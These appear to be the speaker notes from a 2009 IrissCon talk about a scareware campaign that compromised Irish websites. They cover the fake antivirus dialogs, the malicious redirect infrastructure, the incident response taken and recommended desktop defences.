At the initial IrissCon, in 2009, I discussed the investigation, analysis and resolution of a Web Application attack that was part of a larger criminal scareware campaign.
Going to define scareware – Software scares end-user into thinking computer has an infection; 43 million fake anti-virus download attempts (June-July 09) – Symantec white paper Explain why criminals use Scareware and their motives. This is to give theaudience a reason to care about what you are talking about. Describe what happened to end-user computer Describe the infrastructure behind the scareware Describe the Exploit Describe how IRISS handled the incident Give some recommendations and resources for desktop controls Give References Answer questions throughout
IRISS notified by a member. Confirmed it ourselves through testing and further through links with URL/IP/AV vendor and SANS ISC
Dialog Box windows popping up everywhere to scare the end-user NB. – I was able to install AVG during it and sys Internals Tools.
Dialog Box windows popping up everywhere to scare the end-user
Looks very like leading anti-virus/anti-malware desktop solutions
Log file – adding some reality, professionalism
Does that not look the Verisign logo??? At this point, it’s “Game Over”.
Are you sure? Seriously?
At the last minute, I decide I was uncomfortable with paying the cash. It warns me – emphasises that I will be continuing UNPROTECTED. http://sunbeltblog.blogspot.com/2009/07/new-rogue-tactic-blue-screen-of.html - According to anti-spyware firm Sunbelt Software, this ‘Blue Screen of Death’ trick is a new trick from July 2009
The return of the infamous BSOD……this surely has to panic end-users
For the average end-user, this is the only conceivable output.
We have no concrete facts around how the site was exploited, however, there were quite a few issues with servers from this web farm and they were running IIS6 on Windows. Most of the current attacks (confirmed with SANS ISC) are either performed with Gumblar or Asprox. Although the server was running IIS 6.0 the malware did not exploit IIS per se but rather used weak web appsecurity. Tie in with Eoin's talk later and also highlight where the problems lie. http://en.wikipedia.org/wiki/Gumblar Further information -
This is what happened when the user accessed the site – multiple redirects to external sites that all host malware. Therefore, the Irish sites are termed as intermediaries for sites that serve malware. McAfee SiteAdvisor, TrustSource – no good PDF & SWF - do not exploit the latest 0-day but some older vulnerabilities (namely the Collab one and util.printf) Difficult to get sites closed down – complexity (slide 14 will expand on this further) Also highlight that the redirects can happen to any site? E.g. New York Times etc.
Comment on the links we have with Sans ISC. Comment on the advanced skills that the ‘bad guys’ have!!
Exploited sites in Ireland – Irish websites Redirects - Domains hosted in Russia - Russian name & registrar Grownclubfest.ru Poppka.net https://www.onlinepurchasesolution.com https://www.securebillingsoftware.com webst.ru – hosting company Still working on closing sites – still serving malware Servers physically located in China – Netcraft Payment URLs hosted in Canada, registered
Summary of the tools that were used
Contact Hosting Company/Owner Possible temporary take-down Make IRISS members away of malware code Encourage company to disclose to customers (hhhhmmm, keep in?) Inform SANS, AV, IP reputation sites & URL filtering vendors Attempt takedown of malware-serving sites
Recommended steps - Take site offline momentarily while the code is being removed. Only restore service to the site when it has been cleaned or a back-up has been restored. Remove malware code or restore latest clean back-up
Scan application and restore service if clean Ask external URL/AV vendors to rescan site Inform customers if necessary that site is back up
Not sure what to do here – should I be recommending what to do on a web application? Explain how to reduce the risk of this type of attack impacting your server. Contact Hosting Company/Owner Possible temporary take-down Make IRISS members away of malware code Inform SANS, AV & URL filtering vendors Attempt takedown of malware-serving sites
Defence in Depth Desktop – AV, Anti-Spyware, Anti-Malware, Registry Cleaners Personal Firewall Browser – security add-on
Add-ons – NoScript, Google Safe Browsing, AVG Toolbar, WOT, AdBlock Plus, Flashblock, ShowIP, Clear Private Data This scareware only ran on Windows Free Tools - http://zeltser.com/fighting-malicious-software/lookup-malicious-websites.html, http://zeltser.com/fighting-malicious-software/malicious-ip-blocklists.html, http://zeltser.com/reverse-malware/automated-malware-analysis.html
http://sunbeltblog.blogspot.com/2009/07/new-rogue-tactic-blue-screen-of.html Google search http://ddanchev.blogspot.com/ for ‘scareware’ or ‘virus’ http://isc.sans.org/ (Thanks to @bojanz) http://vrt-sourcefire.blogspot.com/2009/11/paranoia-and-rise-of-fake-antivirus.html http://eval.symantec.com/mktginfo/enterprise/white_papers/b-symc_report_on_rogue_security_software_WP_20016952.en-us.pdf http://blogs.sans.org/computer-forensics/2009/11/07/lists-for-investigating-malware-incidents/